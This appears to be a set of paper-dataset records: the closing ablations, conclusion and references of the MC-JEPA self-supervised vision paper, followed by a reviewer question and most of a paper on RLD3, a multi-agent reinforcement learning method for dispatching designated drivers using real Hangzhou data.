| ResNet-50 | 21M | 2.71 | 2.85 | 3.59 | 55.8 | 60.1 |
| ConvNeXt-T | 23M | 2.67 | 2.81 | 3.51 | 67.1 | 70.5 |

Table 5: **Ablation: data sampling.** Comparison between different training orders and data sampling strategies.

| Strategy | K15 | clean | final | ISeg | VSeg |
|---------------------------|------|-------|-------|------|------|
| Flow estimator training | 13.52 | 13.82 | 14.81 | 60.1 | 65.2 |
| Flow estimator fine-tuning | 2.71 | 2.82 | 3.77 | 61.3 | 62.3 |
| Epoch alternation | 4.54 | 4.91 | 5.57 | 63.5 | 66.9 |
| Batch alternation | 2.78 | 2.95 | 3.62 | 67.1 | 70.5 |
| Combined loss | 2.67 | 2.81 | 3.51 | 67.1 | 70.5 |

Figure 5: (1) **Ablation: flow start epoch.** Flow estimation performance as a function of the ImageNet training epoch at which flow estimation starts; there are 100 pretraining epochs in total. (2) **Ablation: cycle consistency coefficient.** Flow estimation performance as a function of the coefficient used to balance the cycle consistency loss of Eq. (5). (3) **Ablation: multi-task balancing coefficient.** Flow estimation and segmentation performance as a function of the balancing coefficient between the flow losses and the SSL loss in Eq. (7).

**Flow start epoch.** We found that starting the multi-task learning of flow and content features at the very beginning of training was not necessary, as the features change very fast; we therefore start with ImageNet pretraining only and introduce flow estimation after a given number of epochs. Figure 5 (1) shows that starting after 10 epochs of ImageNet pretraining is best among several values, when the total number of epochs is fixed to 100. Starting later and doing fewer flow estimation epochs saves a lot of computation time while giving similar results.
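For illustration, the best-performing "combined loss" strategy amounts to one update over a video batch plus an image batch per step. The sketch below assumes callables for the flow and SSL losses; following Figure 5 (3), it scales the flow losses with the balancing coefficient, and which side the coefficient multiplies is our assumption.

```python
import torch

def multitask_step(encoder, flow_head, expander, flow_batch, img_batch,
                   flow_loss_fn, ssl_loss_fn, optimizer, alpha: float = 0.1):
    """One 'combined loss' update: flow losses on a video batch plus the SSL
    loss on an ImageNet batch, back-propagated through the shared encoder.
    alpha = 0.1 is the best multi-task coefficient reported in Fig. 5 (3)."""
    frames_t, frames_t1 = flow_batch   # consecutive video frames
    view_a, view_b = img_batch         # two augmented views of the images

    # flow_loss_fn is assumed to bundle L_rec + L_reg + L_smooth + L_cycle + L_vc
    flow_loss = flow_loss_fn(encoder, flow_head, frames_t, frames_t1)
    ssl_loss = ssl_loss_fn(expander(encoder(view_a)), expander(encoder(view_b)))

    loss = alpha * flow_loss + ssl_loss
    optimizer.zero_grad()
    loss.backward()
    optimizer.step()
    return loss.item()
```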
**Cycle consistency.** Figure 5 (2) shows an ablation on the coefficient that controls the importance of the cycle consistency loss of Eq. (5). Introducing the loss significantly improves the flow estimation, which is explained by the fact that it places an additional constraint on the embeddings, forcing them to be predictable from each other. The coefficient needs to be carefully tuned, as the performance is very sensitive to it.

**Multi-task balancing coefficient.** Figure 5 (3) shows an ablation on the multi-task coefficient that balances our flow estimation loss and our content feature loss. We already observe a significant improvement when introducing flow estimation, even with a very small coefficient. As we increase the coefficient, both the flow estimation and the segmentation improve until we reach a threshold (0.1), after which the segmentation results degrade sharply. This shows that even if flow estimation improves segmentation performance, there is a trade-off between learning motion and content features, and tuning the multi-task coefficient is crucial to maintaining a strong level of performance on both.

### 5 CONCLUSION

We have introduced MC-JEPA, a multi-task approach for learning motion and content features with self-supervised learning and optical flow estimation. MC-JEPA performs well on a wide variety of tasks, ranging from optical flow estimation to segmentation of images and videos. We hope that our approach will foster the use of multi-task learning in self-supervised learning, which might be a path towards learning features that generalize to any downstream task. Future work will learn motion and content from larger collections of natural videos and train the two objectives in a shared data domain, capturing short- and long-range interactions in a hierarchical way.

REFERENCES

A. Geiger, P. Lenz, C. Stiller, and R. Urtasun. Vision meets robotics: The KITTI dataset. *IJRR*, 2013.

Mahmoud Assran, Mathilde Caron, Ishan Misra, Piotr Bojanowski, Florian Bordes, Pascal Vincent, Armand Joulin, Michael Rabbat, and Nicolas Ballas. Masked siamese networks for label-efficient learning. In *ECCV*, 2022.

Mahmoud Assran, Quentin Duval, Ishan Misra, Piotr Bojanowski, Pascal Vincent, Michael Rabbat, Yann LeCun, and Nicolas Ballas. Self-supervised learning from images with a joint-embedding predictive architecture. *arXiv preprint arXiv:2301.08243*, 2023.

Jimmy Lei Ba, Jamie Ryan Kiros, and Geoffrey E. Hinton. Layer normalization. *arXiv preprint arXiv:1607.06450*, 2016.

Shaojie Bai, Zhengyang Geng, Yash Savani, and J. Zico Kolter. Deep equilibrium optical flow estimation. In *CVPR*, 2022.

Hangbo Bao, Li Dong, Songhao Piao, and Furu Wei. Beit: Bert pre-training of image transformers. In *ICLR*, 2022.

Adrien Bardes, Jean Ponce, and Yann LeCun. Vicreg: Variance-invariance-covariance regularization for self-supervised learning. In *ICLR*, 2022a.

Adrien Bardes, Jean Ponce, and Yann LeCun. Vicregl: Self-supervised learning of local visual features. In *NeurIPS*, 2022b.

Zhangxing Bian, Allan Jabri, Alexei A. Efros, and Andrew Owens. Learning pixel trajectories with multiscale contrastive random walks. In *CVPR*, 2022.

Thomas Brox, Andres Bruhn, Nils Papenberg, and Joachim Weickert. High accuracy optical flow estimation based on a theory for warping. In *ECCV*, 2004.

Daniel J Butler, Jonas Wulff, Garrett B Stanley, and Michael J Black.
A naturalistic open source movie for optical flow evaluation. In *ECCV*, 2012.

Mathilde Caron, Piotr Bojanowski, Armand Joulin, and Matthijs Douze. Deep clustering for unsupervised learning of visual features. In *ECCV*, 2018.

Mathilde Caron, Ishan Misra, Julien Mairal, Priya Goyal, Piotr Bojanowski, and Armand Joulin. Unsupervised learning of visual features by contrasting cluster assignments. In *NeurIPS*, 2020.

Mathilde Caron, Hugo Touvron, Ishan Misra, Hervé Jégou, Julien Mairal, Piotr Bojanowski, and Armand Joulin. Emerging properties in self-supervised vision transformers. In *ICCV*, 2021.

Mathilde Caron, Neil Houlsby, and Cordelia Schmid. Location-aware self-supervised transformers. *arXiv preprint arXiv:2212.02400*, 2023.

Ting Chen, Simon Kornblith, Mohammad Norouzi, and Geoffrey E. Hinton. A simple framework for contrastive learning of visual representations. In *ICML*, 2020a.

Xinlei Chen and Kaiming He. Exploring simple siamese representation learning. In *CVPR*, 2020.

Xinlei Chen, Haoqi Fan, Ross Girshick, and Kaiming He. Improved baselines with momentum contrastive learning. *arXiv preprint arXiv:2003.04297*, 2020b.

Xinlei Chen, Saining Xie, and Kaiming He. An empirical study of training self-supervised vision transformers. In *ICCV*, 2021.

Yubei Chen, Adrien Bardes, Zengyi Li, and Yann LeCun. Intra-instance vicreg: Bag of self-supervised image patch embedding. *arXiv preprint arXiv:2206.08954*, 2022.
K7l94Z81bH
Can you clarify the data sparsity issue: why are 3,000 drivers with 13,000 orders a day considered sparse, and what is the effect on the learning algorithm? The performance of the other DRL algorithms is not too bad, which is not what I would expect in a data-sparse environment.
Sparsity-Aware Grouped Reinforcement Learning for Designated Driver Dispatch

Anonymous authors
Paper under double-blind review

Abstract

Designated driving service is a fast-growing market that provides drivers to transport customers in the customers' own cars. The main technical challenge in this business is the design of driver dispatch, due to slow driver movement and sparse orders. To address these challenges, this paper proposes Reinforcement Learning for Designated Driver Dispatch (RLD3). Our algorithm considers group-sharing structures and frequent rewards with heterogeneous costs to achieve a trade-off between heterogeneity, sparsity, and scalability. Additionally, our algorithm addresses long-term agent cross-effects through window-lasting policy ensembles. We also implement an environment simulator to train and evaluate our algorithm using real-world data. Extensive experiments demonstrate that our algorithm achieves superior performance compared to existing Deep Reinforcement Learning (DRL) and optimization methods.

1 Introduction

Designated driving, also known as chauffeur service and substitute driving, is an emerging business in the field of mobility service platforms. These platforms offer professional drivers to transport customers who are unable to drive, such as drunk, rookie, or tired drivers. The designated driver arrives with an electric scooter and drives the customer to their destination, as shown in Figure 1. The platform controller manages dispatching behaviors to improve customers' experience and drivers' income. Designated driving has become a significant and promising industry, with a market size of over 4 billion in China (BusinessGrowthReport, 2022).

One of the critical challenges in this industry is the design of driver dispatch, also known as the fleet management problem. While typical ride-hailing platforms focus on improving the matching quality between drivers and customers, designated driving platforms still struggle to find a driver for each order. This is due to the sparsity of designated drivers and their slow movement. Moreover, designated orders have "hub-and-spoke" structures: origins are concentrated in specific hotspots (e.g., bars, restaurants) while destinations are primarily residential areas, which often results in drivers being far away from potential customers. Optimization methods are commonly used to address fleet management problems (Zhang et al., 2017; Robbennolt & Levin, 2023), but they require a certain level of modeling of the supply and demand dynamics, which are complex in the real world. Recently, many Deep Reinforcement Learning (DRL) approaches have been proposed to solve fleet management problems in ride-hailing services (Oda & Joe-Wong, 2018; Al-Kanj et al., 2020; Zhang et al., 2020; Liu et al., 2020; Shou & Di, 2020; Qin et al., 2021; Eshkevari et al., 2022; Liu et al., 2022; Zheng et al., 2022). However, designated driving presents unique challenges compared to traditional taxi ride-hailing systems. The challenges stem mainly from sparsity, which can be attributed to three key factors.

Firstly, the dataset itself exhibits sparsity. In designated driving, the number of drivers is considerably smaller than in taxi services, resulting in a sparser spatial-temporal distribution. To illustrate, our dataset, collected from Hangzhou, a Chinese city with a population of approximately 10 million, contains only around 3,000 designated drivers and nearly 13,000 order requests per day.
Secondly, individual drivers experience sparse feedback on the direct matching of orders. As designated drivers move slowly and are often located far away from available orders, each driver, on average, completes only 3 to 4 orders per day. Additionally, after matching with an order, the driver also spends a significant amount of time on the way to pick up the client.

Thirdly, the cross-effect of agents is sparse and long-lasting. This is due to the slow and continuous impact of driver movements on their distribution, which is crucial in fleet management. Before each driver is matched with an order, they typically engage in continuous movement for several quarters. Therefore, considering the lasting impact becomes more crucial than focusing solely on the transient movements of other agents. Moreover, the heterogeneity and scalability of agents pose additional challenges for traditional multi-agent reinforcement learning (MARL) algorithms. Factors such as varying speeds and mileage limitations among different drivers, as well as the fluctuating number of drivers commuting to work each day, further contribute to these challenges.

To address these challenges, this paper proposes a group-sharing, window-lasting Reinforcement Learning framework for Designated Driver Dispatch problems, RLD3. We model the problem as a Decentralized Partially Observed Markov Decision Process (Dec-POMDP), capturing the fact that drivers usually have only local observations. RLD3 incorporates several novel designs. Firstly, we introduce a group-sharing structure, where agents are classified into several groups; agents within the same group share the same network parameters and experience data. This design strikes a balance among sparsity, heterogeneity, and scalability. Secondly, we design a reward structure for the DRL algorithm. This specially designed reward estimates the potential of the neighborhood around the driver by considering the distances of all unmatched orders in that area, addressing the issue of sparse feedback; it also incorporates complicated movement constraints by applying heterogeneous moving costs. Thirdly, we design a time window to calculate the cumulative actions of agents during consecutive execution periods, allowing the estimation of other agents' policies and making the approach suitable for sparse and lasting multi-agent interactions. Finally, we implement an environment simulator using real-world designated driving datasets and conduct extensive experiments to train and evaluate different algorithms. The results demonstrate that RLD3 outperforms existing DRL benchmarks and optimization policies in terms of completed order numbers and adherence to moving constraints.

The main contributions of this paper are summarized as follows: i) We are the first to formulate a general Dec-POMDP framework for designated driver dispatch problems in designated driving markets. ii) We propose a novel MARL algorithm, RLD3, to address the challenges of designated driver dispatch and achieve a trade-off among scalability, heterogeneity, and sparsity. This algorithm builds upon group-sharing structures and window-lasting agent interactions with a potential/cost-aware reward. iii) We design a designated driving simulator using real-world datasets and conduct extensive experiments. The results show that RLD3 efficiently learns the system dynamics and outperforms existing DRL and optimization methods.

2 RELATED WORK

Driver Dispatch. As mentioned in Section 1, the driver dispatch problem has been extensively investigated in the existing literature.
Two prominent methodologies have garnered significant attention: optimization algorithms (Zhang et al., 2016; Robbennolt & Levin, 2023) and DRL-based algorithms (Oda & Joe-Wong, 2018; Al-Kanj et al., 2020; Zhang et al., 2020; Liu et al., 2020; Shou & Di, 2020; Qin et al., 2021; Eshkevari et al., 2022; Liu et al., 2022; Zheng et al., 2022). Optimization algorithms leverage historical driver and order distributions to formulate dispatch policies, but they require precise knowledge of the demand-supply dynamics, which is challenging to obtain in the real world. DRL-based algorithms are powerful tools for solving driver dispatch problems, as they can learn a parametric model without relying on strong problem-based assumptions and can optimize long-term effects through sequential decision-making. However, taxi drivers move at a faster speed, and taxi orders are much denser and more balanced; these features significantly reduce the sparsity challenges faced by traditional DRL-based dispatch algorithms. Thus, it is difficult to directly transfer these models and algorithms to the designated driving platform.

**Reinforcement Learning.** Reinforcement learning (RL) techniques have shown promise in addressing complex multi-agent problems. The Multi-Agent Deep Deterministic Policy Gradient algorithm (MADDPG) (Lowe et al., 2017) extends the Deep Deterministic Policy Gradient (DDPG) (Lillicrap et al., 2016) and Deterministic Policy Gradient (Silver et al., 2014) algorithms by using deep neural networks to approximate action values and handle agent interactions. Such algorithms, which follow the traditional centralized-training, decentralized-execution (CTDE) paradigm (Claus & Boutilier, 1998), often allow agents to achieve good overall performance by utilizing heterogeneous strategies. However, because each agent's policy is independent, they encounter the challenge of sparse feedback in the designated driving problem, leading to lower efficiency in exploration and policy learning. To address sparsity, Random Network Distillation (RND) (Burda et al., 2019) uses an additional value function to estimate an intrinsic reward in order to enhance exploration. On the designated driving platform, however, due to the unique "hub-and-spoke" structure of orders, order hotspots are highly concentrated, and exploring non-semantic information would result in excessive driver movement costs. Curriculum Learning approaches, such as Curriculum Deep Reinforcement Learning (Hacohen & Weinshall, 2019) and Relevant Curriculum Reinforcement Learning (Flet-Berliac & Preux, 2020), help with learning from sparse feedback by planning the neural network's learning path. However, planning learning paths in multi-agent scenarios is challenging due to the complex dynamics of cooperation and competition among drivers. Mean-Field Reinforcement Learning (MFRL) techniques, such as Mean Field Multi-Agent Reinforcement Learning (MFMARL) (Yang et al., 2018) and Multi-Agent Mean Field Q-Learning (Ganapathi Subramanian et al., 2020), model agent interactions as the interaction between a single agent and a field effect. Mean-field methods can address the issue of sparse agent distributions, but they do not account for the lasting interactions between drivers, which should be taken into account since designated drivers move slowly and face complex constraints.
To address scalability and heterogeneity, Hierarchical Reinforcement Learning (HRL) approaches, such as Feudal HRL (Vezhnevets et al., 2017), Data-Efficient HRL (Nachum et al., 2018), and Model-Free HRL (Rafati & Noelle, 2019), decompose large-scale problems into sub-agents. In the context of designated driver dispatch, however, additional attention must be paid to the complex interactions among agents and the various sparsity issues mentioned above.

### 3 RLD3: Reinforcement Learning for Designated Driver Dispatch

In this section, we present the formulation of the Decentralized Partially Observed Markov Decision Process (Dec-POMDP) for the designated driver dispatch problem. We introduce three unique designs in our algorithm: the grouped structure, the potential reward, and the lasting agent interaction.

#### 3.1 Formulation

We consider the designated driving service in one metropolis. Each day, there are $N$ drivers with random initialization. Orders appear in the system at specific times and locations. Unmatched orders have limited patience and are canceled after a waiting period that follows a Poisson distribution. Drivers that have completed their corresponding orders leave the system after their off-duty time. For simplicity, we assume that time in the system is slotted, with each time step corresponding to 30 seconds. At each time step, the platform decides the dispatch movement for every idling driver. We assume that drivers fully comply with movement instructions. The statuses of drivers and orders are updated before the next time step according to matches between idling drivers and unmatched orders, as well as the order generation/completion processes. The Dec-POMDP formulation $\langle N, S, O, A, P, R, \gamma \rangle$ is presented as follows:

**Agent** $i \in [N]$: Each driver is considered an agent, resulting in a total of $N$ unique agents. The platform can only dispatch idling drivers, as each agent is in one of three statuses at any given time $t$: offline, idle, or serving an order.

**State** $s \in S$: At each time $t$, a global state is maintained, taking into account the status of all drivers and orders. This includes coordinates, moving distance, working status, serving targets, and moving targets for drivers, as well as calling time, patience, origin, destination, and serving status for orders.

**Observation** $s \mapsto o_i \in O$: Drivers have partial observations of the state $s$. In our implementation, each agent's observation is represented by a 22-dimensional vector:
$$([\#\text{order}], [\#\text{driver}], [\min \text{dist}], t, \text{lat}, \text{lng}, \text{move}),$$
where the first three terms denote, for each of the six-segment-direction neighborhoods shown in Figure 12, the number of orders to be matched, the number of idling drivers, and the distance to the closest order. The last four terms represent the time, latitude, longitude, and the distance the driver has already moved.

**Action** $a_1 \times \cdots \times a_N \in A$: The platform proposes a joint action instructing the movement policy for all available drivers based on their observations at time $t$. The action space of an individual agent consists of seven discrete actions: the six neighboring directions and staying at the current location, as shown in Figure 11. Agents located at the boundary and corners have a smaller action space.
**State Transition** $P : s \times a_{[N]} \mapsto s'$: The movement of drivers, along with order updates and matches between drivers and orders, induces state transitions in the environment.

**Reward** $r_i \in \mathbb{R}$: After executing an action, each agent receives its own instant reward $r_i$. The instant reward $r_i^t$ is defined as the sum of the immediate match reward, the neighborhood potential reward, and the move cost:
$$r_i^t = mt_i^t + nb_i^t + mv_i^t.$$
The immediate match reward $mt_i^t$ directly relates to the gross merchandise volume of the platform, which is the objective of our algorithm. To optimize volume without using discriminatory personal information, the immediate match reward is set to a fixed number:
$$mt_i^t = \begin{cases} 50, & \text{if agent } i \text{ is matched with an order at } t; \\ 0, & \text{otherwise.} \end{cases}$$
The move cost and the neighborhood potential reward are introduced in Sections 3.2 and 3.3.

3.2 Towards Dataset Sparsity through Group Sharing

We introduce the concept of group sharing to address dataset sparsity issues in our approach. Meanwhile, we estimate the influence between these groups using a mean-field effect to preserve heterogeneity and scalability. In real-world scenarios, drivers can be classified into several types based on their cost conditions, so these endogenously heterogeneous agents naturally partition into several groups. Agents within a group share the same network along with their experience data during training. Specifically, we divide the $N$ agents into $M$ classes, where $M$ is a fixed number. To control grouped drivers' moving distance, we include the move cost $mv_i^t$ in the reward as a regularizer that shapes agent behavior. The move cost for agent $i$ at time $t$ is set as follows:
$$mv_i^t = \begin{cases} -c_j, & \text{if agent } i \text{ moves;} \\ 0, & \text{if agent } i \text{ stays,} \end{cases}$$
where $j$ is the group index of agent $i$.

RLD3 utilizes double critic networks and double actor networks, with delayed copies used for soft updates. During the training stage, a group network can access the experience data of all agents belonging to that group, stored in a shared replay buffer; a network can therefore efficiently explore different individuals of the same category across the metropolis and gather more experience. During the execution stage, each agent calls its corresponding group network to execute its policy independently. The policy input for each agent is its current observation, and the output is its deterministic action. To transform the continuous seven-dimensional output vector into a discrete action, the last layer uses Gumbel-Softmax (Jang et al., 2017). Such a mixed strategy ensures that even agents of the same group at the same location may execute different discrete actions, avoiding competition among agents. The information flow during the execution stage is illustrated in Figure 2.

3.3 Towards Feedback Sparsity through Space Potential

Since the immediate match reward is highly sparse for DRL methods on designated driving platforms (i.e., it occurs only at the rare time steps with a successful order match), we introduce a dense neighborhood potential reward $nb_i^t$ to reflect the potential value of the current area. The intuition is that the distance to an order in the neighborhood reflects how fast an agent can pick up the order.
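As an aside before developing this potential term, the overall reward assembly admits a very small sketch. The function and variable names below are hypothetical rather than the authors' implementation, and the potential term is treated as a given input here:

```python
def instant_reward(matched: bool, moved: bool, group_cost: float,
                   nb_potential: float) -> float:
    """Per-agent instant reward r_i^t = mt_i^t + nb_i^t + mv_i^t.

    `group_cost` is the per-group move cost c_j; `nb_potential` is the
    neighborhood potential nb_i^t defined below.
    """
    mt = 50.0 if matched else 0.0        # immediate match reward
    mv = -group_cost if moved else 0.0   # heterogeneous move cost
    return mt + nb_potential + mv
```

With the components in hand, we now return to the neighborhood potential itself.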
Almost all orders in the neighborhood are attractive to the driver, although the closest ones are especially attractive. Specifically, we assign potential values to nearby unmatched orders, with higher feedback given to closer orders, and then sum all potential values to represent the total potential of the driver's current position. This provides reward feedback to the driver at every time step, compensating for the sparse immediate match reward. The potential reward is defined as follows:
$$nb_i^t = (d^* + 0.1)^{-0.5} + 0.1 \times \sum_{\text{neighbor order } j} (d_{ij} + 0.1)^{-0.5},$$
where $d_{ij}$ denotes the distance from driver $i$ to order $j$, and $d^*$ denotes the distance to the closest order. The power index is set to $-0.5$ so that the potential reward increases as the distance shrinks and is convex, encouraging designated drivers to approach a specific order rather than maintain an equal distance from all orders.

3.4 Towards Interaction Sparsity through Window Lasting

On designated driving platforms, agents are often far away from each other, resulting in sparse, long-term agent interactions rather than single-step effects. For example, a driver's income is not directly influenced by the short-term actions of drivers located far away, but rather by the accumulated distribution changes caused by the lasting movements of drivers. Therefore, we use the average action over a time window, instead of a single-step action, when considering other agents' policies. To achieve this, in addition to recording regular tuples $(s, a_{[N]}, r_{[N]}, s')$, the buffer calculates and stores the window-lasting actions of all agents. The window-lasting action $\hat{a}_i^t$ is the average of the sequential idling actions over the last $W$ time steps:
$$\hat{a}_i^t = \mathbb{E}_{s \sim [t - W, t] \cap T_{\text{last idle}}} \left[ a_i^s \right],$$ (6)
where $T_{\text{last idle}}$ refers to the most recent period in which the driver was idling; this restriction accounts for the fact that different idling periods may involve diverse moving directions. The mean-field effect for group $j$ is then defined as:
$$g_j^t = \mathbb{E}_{i \in \text{group } j} \left[ \hat{a}_i^t \right].$$ (7)

Additionally, we use an encoder at the input of the critic to handle complex state representations with varying dimensions. This encoder summarizes the distributions of the current unmatched orders and of the idling agents, respectively; we employ the K-Means algorithm (Hartigan & Wong, 1979) for this purpose. The input structure of the critic network is therefore $Q_i(o_i, \text{encode}(s), a_i, g_{[M]})$, as shown in Figure 3. All networks use two fully connected layers and the GELU activation function (Hendrycks & Gimpel, 2016).

Figure 3: Network structure.

### 3.5 NETWORK UPDATE

The network update follows the gradient-based actor-critic paradigm. To encourage smoother driver trajectories, we add the temporal difference of adjacent actions, $H(a, a') = \|a - a'\|_2$, to the Bellman loss to form the critic loss.
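Before writing out the resulting objectives, a minimal numpy sketch of Equations 6 and 7 may be useful; the array layouts and names are illustrative rather than the authors' implementation:

```python
import numpy as np

def window_lasting_action(action_history: np.ndarray, idle_mask: np.ndarray,
                          t: int, W: int) -> np.ndarray:
    """Window-lasting action (Eq. 6): average the agent's actions over the
    last W steps, restricted to its most recent contiguous idling period.

    action_history: (T, 7) array of per-step action vectors.
    idle_mask:      (T,) boolean array, True where the agent was idling.
    """
    lo = max(0, t - W)
    steps = []
    for s in range(t, lo - 1, -1):   # walk backwards from t
        if not idle_mask[s]:
            break                    # stop at the start of the idling period
        steps.append(s)
    if not steps:
        return np.zeros(action_history.shape[1])
    return action_history[steps].mean(axis=0)

def group_mean_field(hat_actions: np.ndarray, group_ids: np.ndarray, j: int) -> np.ndarray:
    """Mean-field effect of group j (Eq. 7): average of the window-lasting
    actions over all agents in that group."""
    return hat_actions[group_ids == j].mean(axis=0)
```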
After incorporating the above techniques, the loss function for the value network becomes:
$$L(\theta_i) = \mathbb{E}_{\text{sample } t} \left[ \left( Q^\pi_i(o_i, \text{encode}(s), a_i, g_{[M]}) - y \right)^2 + \lambda H(a_i, a'_i) \right],$$
$$y = r_i + \gamma Q^{\pi'}_i(o'_i, \text{encode}(s'), a'_i, g_{[M]}).$$ (8)

Similarly, the gradient of the policy network is now:
$$\nabla_{\theta_i} J(\pi_i) = \mathbb{E}_{\text{sample } t} \left[ \nabla_{\theta_i} \pi_i(a_i | o_i) \nabla_{a_i} Q^\pi_i(o_i, \text{encode}(s), a_i, g_{[M]}) \big|_{a_i = \pi_i(o_i)} \right].$$ (9)

The complete algorithm framework is summarized in Algorithm 1.

### 4 SIMULATOR & EXPERIMENT

We design and implement a simulator based on real-world datasets to train and evaluate RL algorithms for the designated driver dispatch problem. We then conduct experiments on our proposed model using the simulator and real-world data. We sample 50 drivers and 500 orders for the training stage. Each experiment is repeated with 4 different seeds, and the average results with confidence intervals are reported. To mitigate the sparsity issue in early training, we use the first 100 episodes for random exploration.

Algorithm 1 RLD3.

Require: order data, driver pool $[N]$, episode number $MAX$, episode length $T$, learning rate $\alpha$, update rate $\tau$, batch size $S$, group number $M$, window size $W$.
1: for episode from 1 to $MAX$ do
2: Initialize the environment and receive an initial state $s$.
3: for $t$ from 1 to $T$ and not all drivers are off-line do
4: Generate actions $a_i = \pi_i(o_i)$ for every idling driver $i$.
5: Execute the joint action $(a_1, a_2, \cdots, a_N)$ and observe reward $r$ and next state $s'$.
6: Push $(s, a, r, s', \hat{a})$ into the buffer.
7: $s = s'$.
8: end for
9: for group $j$ from 1 to $M$ do
10: Sample a batch of $S$ samples $(s, o_i, a_i, r_i, s', \hat{a}_i)$ $(i \in \text{group } j)$ from the replay buffer.
11: Update the critic by minimizing $L(\theta_j)$.
12: Update the actor using the sampled policy gradient $\nabla_{\theta_j} J$.
13: end for
14: Update the target network parameters for each agent $i$ by $\theta'_i = \tau \theta_i + (1 - \tau) \theta'_i$.
15: end for

4.1 Simulator

The simulator is built from real-world designated driver and order datasets from Hangzhou, a city in China. The datasets include over 3,000 drivers and nearly 13,000 orders per day. Each order's record consists of its coordinates and the times of generation, match, completion, and possible cancellation. Each driver's record includes their online time, offline time, and online coordinates. The simulator models the entire process of how the states of drivers and orders evolve, and it includes a driver dispatch module that allows the repositioning of any idling driver. The simulator serves as a training environment for RL algorithms and can also evaluate the performance of various dispatch policies. A detailed introduction of the simulator is given in Appendix A.

4.2 Performance Comparison

We compare the performance of our algorithm with existing DRL methods and optimization-based policies. The benchmark DRL algorithms include independent DDPG (Lillicrap et al., 2016), MADDPG (Lowe et al., 2017), MAMFRL (Yang et al., 2018), and a multi-agent version of RND (Burda et al., 2019). These algorithms are applied with the immediate match reward and move cost to achieve a trade-off between matching and movement. All DRL algorithms use the same two hidden layers of dimension 64 and a batch size of 512.
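For concreteness, the critic update of Equation 8 can be sketched in PyTorch as follows; the module and tensor names, and the values of $\gamma$ and $\lambda$, are illustrative placeholders rather than the authors' released code:

```python
import torch
import torch.nn.functional as F

def critic_update(critic, target_critic, optimizer, batch, gamma=0.95, lam=0.1):
    """Sketch of the critic loss in Eq. 8: Bellman error plus the
    action-smoothness penalty lam * H(a, a') = lam * ||a - a'||_2.
    `batch` packs tensors sampled from the group replay buffer."""
    o, s_enc, a, g, r, o2, s_enc2, a2, g2 = batch
    with torch.no_grad():
        y = r + gamma * target_critic(o2, s_enc2, a2, g2)   # TD target
    q = critic(o, s_enc, a, g)
    smooth = torch.norm(a - a2, p=2, dim=-1).mean()         # H(a, a')
    loss = F.mse_loss(q, y) + lam * smooth
    optimizer.zero_grad()
    loss.backward()
    optimizer.step()
    return loss.item()
```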
The update rate is set to 0.01, and optimization uses the Adam optimizer (Kingma & Ba, 2015) with an initial learning rate of 0.01. All DRL algorithms are trained for 1000 episodes. In RLD3, the lasting window size is set to 60 steps, and the group number is set to 5. The optimization-based policies include an order-oriented random walk, the Max-throughput dispatch policy (Robbennolt & Levin, 2023), and model predictive control (MPC) (Zhang et al., 2016). To ensure a fair comparison, the optimization-based methods estimate the current order and driver dynamics from past history.

Figure 4: Training performance. The order of the legends in the figure matches the order of performances in the last episode.

Table 1: Testing performance. The testing performance is evaluated with the model that has the best episodic performance, while the IID generalization performance is measured on an additional testing dataset of 10 episodes separated from the training dataset.

| Category | Algorithm | Order (testing) | Distance (km, testing) | Order (IID) | Distance (km, IID) |
|-----------------|-----------------|-------------|-------------|-------------|-------------|
| Our Algorithm | RLD3 | 237.2 ± 3.4 | 7.0 ± 1.3 | 234.0 ± 3.9 | 7.0 ± 1.3 |
| Taxi-dispatch | Deep-dispatch | 233.3 ± 2.3 | 15.5 ± 2.4 | 229.0 ± 2.3 | 15.1 ± 2.3 |
| DRL-based | DDPG | 186.9 ± 5.2 | 27.8 ± 3.0 | 183.1 ± 5.5 | 27.9 ± 3.1 |
| DRL-based | MADDPG | 215.7 ± 3.7 | 29.6 ± 0.6 | 212.0 ± 4.4 | 30.2 ± 0.5 |
| DRL-based | MADDPG-RND | 228.6 ± 3.5 | 65.3 ± 0.7 | 224.0 ± 3.7 | 66.3 ± 0.9 |
| DRL-based | MAMFRL | 224.3 ± 3.7 | 34.3 ± 5.3 | 221.1 ± 4.8 | 34.9 ± 5.5 |
| Optimization | Random | 180.1 | 35.3 | 178.3 | 34.4 |
| Optimization | Max-throughput | 229.8 | 73.2 | 228.8 | 73.1 |
| Optimization | MPC | 228.1 | 1.7 | 228.2 | 1.5 |

As shown in Figure 4 and Table 1, our model outperforms all other algorithms in terms of the number of completed orders and has a smaller moving distance than the methods with comparable order performance. As discussed in Section 2, RND falls into non-semantic exploration because its agents keep moving; MADDPG and MAMFRL fail to differentiate the value of different directions when there are no nearby orders, resulting in a significant amount of random walking. Among the optimization baselines, the Max-throughput policy optimizes the Lyapunov drift by treating the drivers as servers, which leads to intense competition among drivers for orders. MPC, one of the most popular algorithms in control theory, outperforms the DRL baselines, except for our proposed algorithm RLD3.

4.3 INDEPENDENT AND IDENTICALLY DISTRIBUTED (IID) GENERALIZATION

We conducted IID generalization experiments to assess the robustness and generalization of our algorithm. In IID generalization, the data points in both the training and testing datasets are assumed to be drawn independently and identically from the same underlying distribution (Kirk et al., 2023), so generalization performance is synonymous with test-time performance on IID samples. In every episode, we sampled another 500 orders from the real-world data that were not seen during training. As shown in Table 1, our algorithm does not decline significantly in IID performance and still outperforms the other methods. An interesting phenomenon is that all algorithms demonstrate good IID generalization performance. This is because the designated driving platform itself exhibits sparsity, and the hotspots of orders are concentrated.
Since we maintain the same initial state for all drivers and the same underlying order distribution in the IID generalization test, drivers are still able to effectively transfer the hotspot information learned from previous experience when moving.

4.4 ABLATION STUDY

We conducted an ablation study on the group-sharing structure, the agent interaction design, the state encoder, and the reward design to gain insight into our model's settings and behavior.

**Group Number.** The group number is a typical hyperparameter that determines the number of agent types. A larger group number can better represent the heterogeneity of drivers, but it also increases storage pressure and training time; moreover, a large group number may not learn well under sparse feedback. The results in Table 2 show that the group-sharing structure improves the performance of both MADDPG and our proposed algorithm RLD3.

**Window-lasting Agent Interaction.** Our algorithm uses a window-lasting policy ensemble in the updating stage to better learn the cross-effects of other agents' policies. We evaluated the algorithm without the window average. As shown in Table 2, the model without the window-lasting interaction cannot learn other agents' policies well. This could be due to high-frequency fluctuations in agent actions that are difficult to learn, as well as the fact that single-step actions may not be executed by agents that are not idling. Consequently, the value function underfits when other agents' policies are ensembled without the window average.

Table 2: Ablation study.

| Algorithm | Order | Distance (km) |
|----------------------------|---------|---------------|
| RLD3 | 237.2 ± 3.4 | 7.0 ± 1.3 |
| RLD3 for 1 group | 150.5 ± 9.2 | 21.5 ± 1.2 |
| RLD3 for 50 groups | 231.7 ± 3.6 | 9.1 ± 0.4 |
